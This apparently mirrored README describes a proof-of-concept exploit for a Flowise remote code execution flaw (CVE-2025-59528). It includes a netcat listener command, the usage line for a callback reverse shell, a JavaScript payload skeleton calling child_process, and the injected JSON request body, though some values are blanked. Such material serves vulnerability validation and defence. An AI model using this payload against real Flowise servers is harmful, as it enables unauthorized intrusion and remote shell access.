Share
## https://sploitus.com/exploit?id=B64D6F51-68A9-5171-AE7E-7B669615BA5B
[Version francaise](README.fr.md)

# CVE-2025-59528 Proof of Concept

Minimal PoC focused on technical validation of the vulnerability in an authorized environment.

## Prerequisites

- You must have a user account on the target Flowise dashboard.
- You must have a valid API key linked to that account.
- You must start a listener on your callback host before running the PoC (example: `nc -lvn 4444`).

## Usage Example

Start the listener first:

```bash
nc -lvn 4444
```

```bash
python3 poc.py --domain example.com --host 10.10.10.1 --port 4444 --api YOUR_VALID_API_KEY
```

Replace the values with your authorized environment settings.

## CVE Summary

- **Affected product**: Flowise
- **Affected versions**: lower than `3.0.5`
- **Type**: `Remote Code Execution (RCE)`
- **Entry point**: `POST /api/v1/node-load-method/customMCP` endpoint

The issue comes from how `inputs.mcpServerConfig` is processed: this value is interpreted in a way that allows server-side JavaScript execution. In practice, an authenticated attacker can inject an expression that calls `child_process` and runs an OS command.

## Exploitation Mechanism

The exploitation flow is:

1. Build a request to the `customMCP` endpoint.
2. Put a malicious JavaScript expression in `mcpServerConfig`.
3. Trigger `process.mainModule.require('child_process')`.
4. Execute an OS command (`exec`/`execSync`).

If accepted, the server executes the command in its system context.

## How This PoC Works (`poc.py`)

The script takes four arguments:

- `-d/--domain`: target domain
- `-lh/--host`: callback IP
- `-lp/--port`: callback port
- `-A/--api`: Bearer API token

Then it:

1. Builds the vulnerable URL: `http:///api/v1/node-load-method/customMCP`
2. Adds the `Authorization: Bearer ` header
3. Prepares a callback shell command
4. Injects that command into a JS expression:

```js
({
  x: (function () {
    const cp = process.mainModule.require("child_process");
    cp.exec("");
    return 1;
  })(),
});
```

5. Sends this JSON:

```json
{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": ""
  }
}
```

6. Prints the HTTP status and raw response for validation.

## Why This PoC Is Better (vs EDB 52440)

Compared to the EDB PoC (which performs email/password login, uses browser-like headers, and runs a free-form `--cmd`), this script is better for pure PoC validation:

1. **More direct**: no login flow and less unnecessary HTTP noise.
2. **Lower breakage surface**: fewer steps tied to frontend/auth config.
3. **CI-friendly automation**: simple arguments and quick output.
4. **Clearer validation**: status + body are printed immediately.
5. **Focused on the core CVE path**: `mcpServerConfig` injection and server-side execution.

In short: the EDB script is a more generic offensive demo, while this PoC is more targeted for technical reproducibility.

## Current Limitations

- Assumes a valid API token already exists.
- No `https` mode or certificate handling.
- No retry/backoff logic.
- Callback command is hardcoded (not yet parameterized via `--cmd`).

## Responsible Use

Test only on systems you own or where you have explicit authorization.